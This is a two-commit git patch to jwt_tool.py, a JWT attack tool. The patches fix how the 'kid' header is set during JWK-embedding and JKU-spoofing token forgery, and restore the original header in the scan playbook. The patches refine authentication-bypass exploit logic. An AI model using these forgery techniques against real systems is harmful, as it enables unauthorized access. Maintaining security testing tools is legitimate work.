From 323ebc9d4c516d3aedb19e7c00e74f7889a26ddd Mon Sep 17 00:00:00 2001
From: Daniel Wilkinson <danielbrianwilkinson@gmail.com>
Date: Fri, 22 Jul 2022 10:23:09 +0100
Subject: [PATCH 1/2] During JWK injection, set kid header to match JWK kid so
 that the key is used

---
 jwt_tool.py | 1 +
 1 file changed, 1 insertion(+)

diff --git a/jwt_tool.py b/jwt_tool.py
index 23e9c14..bab1afe 100644
--- a/jwt_tool.py
+++ b/jwt_tool.py
@@ -771,6 +771,7 @@ def jwksEmbed(newheadDict, newpaylDict):
     newjwks = buildJWKS(n, e, "jwt_tool")
     newHead["jwk"] = newjwks
     newHead["alg"] = "RS256"
+    newHead["kid"] = newjwks["kid"]
     key = privKey
     # key = RSA.importKey(privKey)
     newContents = genContents(newHead, newpaylDict)

From ac09d07b8fb9c06531fa1aa1e54c8a49f9054b63 Mon Sep 17 00:00:00 2001
From: Daniel Wilkinson <daniel.wilkinson@nccgroup.com>
Date: Fri, 22 Jul 2022 12:04:53 +0100
Subject: [PATCH 2/2] Revert kid after JWK injection, and also fix kid for JKU
 injection

---
 jwt_tool.py | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/jwt_tool.py b/jwt_tool.py
index bab1afe..c34cbac 100644
--- a/jwt_tool.py
+++ b/jwt_tool.py
@@ -739,6 +739,7 @@ def jwksGen(headDict, paylDict, jku, privKey, kid="jwt_tool"):
     newjwks = buildJWKS(n, e, kid)
     newHead["jku"] = jku
     newHead["alg"] = "RS256"
+    newHead["kid"] = config["customising"]["jwks_kid"]
     key = RSA.importKey(privKey)
     newContents = genContents(newHead, paylDict)
     newContents = newContents.encode('UTF-8')
@@ -1370,6 +1371,10 @@ def injectOut(newheadDict, newpaylDict):
 def scanModePlaybook():
     cprintc("\nLAUNCHING SCAN: JWT Attack Playbook", "magenta")
     origalg = headDict["alg"]
+    try:
+        origkid = headDict["kid"]
+    except:
+        origkid = False
     # No token
     tmpCookies = config['argvals']['cookies']
     tmpHeader = config['argvals']['header']
@@ -1419,6 +1424,10 @@ def scanModePlaybook():
     jwksig, jwksContents = jwksEmbed(headDict, paylDict)
     jwtOut(jwksContents+"."+jwksig, "Exploit: Injected JWKS (-X i)")
     headDict["alg"] = origalg
+    if origkid:
+        headDict["kid"] = origkid
+    else:
+        del headDict["kid"]
     if origjwk:
         headDict["jwk"] = origjwk
     else:
@@ -1431,6 +1440,10 @@ def scanModePlaybook():
     jku = config['services']['jwksloc']
     newContents, newSig = exportJWKS(jku)
     jwtOut(newContents+"."+newSig, "Exploit: Spoof JWKS (-X s)", "Signed with JWKS at "+config['services']['jwksloc'])
+    if origkid:
+        headDict["kid"] = origkid
+    else:
+        del headDict["kid"]
     if origjku:
         headDict["jku"] = origjku
     else: